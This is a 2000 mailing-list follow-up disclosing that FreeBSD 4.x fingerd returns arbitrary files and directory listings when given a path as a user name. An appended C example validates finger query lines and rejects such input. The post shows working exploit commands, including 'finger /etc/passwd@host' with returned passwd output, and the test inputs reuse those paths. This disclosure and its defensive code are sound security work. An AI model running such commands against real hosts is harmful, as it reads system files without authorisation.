Subject: Re: [sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]
From: Przemyslaw Frasunek (venglin@FREEBSD.LUBLIN.PL)
Date: Tue Oct 03 2000 - 13:18:12 CDT


On Mon, Oct 02, 2000 at 08:56:40PM +0200, Przemyslaw Frasunek wrote:
> If finger takes full path name as user name, it prints out contents of
> that file. Because fingerd executes finger as local information
> provider, finger /path/to/file@some.host prints /path/to/file at
> some.host.

BTW, the problem persists only in the 4.x branch. Of course, it also
allows traversing directory structures:

riget:venglin:~> finger /etc/@lagoon | strings | head -n 3
[lagoon.freebsd.lublin.pl]
^^^L^^D^A.^^^^B^^^^L^^D^B..^^^^W^A^^T^^D^Hdefaults^^A^^^A
^^^T^^H protocols^^^^B

riget:venglin:~> finger /etc/passwd@lagoon | head -n2
[lagoon.freebsd.lublin.pl]
root:*:0:0:Przemyslaw Frasunek:/home/root:/usr/local/bin/tcsh

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
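
The behaviour reported above comes from a path-like string reaching the local finger program as a "user name". As an added example (not part of the original post and not FreeBSD's code), here is a check a finger daemon could apply to each RFC 1288 query line before passing it on; the function names, the 32-character limit and the allowed character set are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Accept only tokens that look like login names (assumed policy). */
static bool safe_user_token(const char *tok, size_t len)
{
    if (len == 0 || len > 32 || tok[0] == '-')   /* no option injection */
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)tok[i];
        if (!(isalnum(c) || c == '_' || c == '.' || c == '-'))
            return false;   /* rejects '/', '@', control bytes, ... */
    }
    return true;
}

/* Validate one query line: optional leading "/W", then user names only. */
bool finger_query_is_safe(const char *line)
{
    const char *p = line;
    const char *end = line + strcspn(line, "\r\n");
    bool first = true;

    while (p < end) {
        while (p < end && (*p == ' ' || *p == '\t'))
            p++;
        const char *tok = p;
        while (p < end && *p != ' ' && *p != '\t')
            p++;
        size_t len = (size_t)(p - tok);
        if (len == 0)
            break;
        /* "/W" (verbose) is the only token allowed to contain '/'. */
        bool is_w = first && len == 2 && tok[0] == '/' &&
                    (tok[1] == 'W' || tok[1] == 'w');
        if (!is_w && !safe_user_token(tok, len))
            return false;
        first = false;
    }
    return true;    /* an empty query (list users) is allowed here */
}

int main(void)
{
    /* Constructed sample query lines. */
    const char *q[] = { "venglin\r\n", "/W venglin\r\n", "/etc/passwd\r\n", "/etc/\r\n" };
    for (size_t i = 0; i < sizeof q / sizeof q[0]; i++)
        printf("%-14.*s %s\n", (int)strcspn(q[i], "\r\n"), q[i],
               finger_query_is_safe(q[i]) ? "accept" : "reject");
    return 0;
}
```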